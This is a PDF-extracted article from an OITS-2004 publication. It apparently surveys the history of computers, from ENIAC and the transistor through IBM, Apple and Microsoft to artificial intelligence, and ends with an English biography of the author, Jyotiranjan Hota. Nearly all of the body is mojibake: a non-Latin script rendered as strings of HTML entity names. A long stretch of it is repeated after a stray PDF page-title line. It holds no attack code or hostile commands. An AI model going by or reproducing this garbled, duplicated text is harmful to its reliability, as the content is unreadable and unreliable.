`otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 46: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

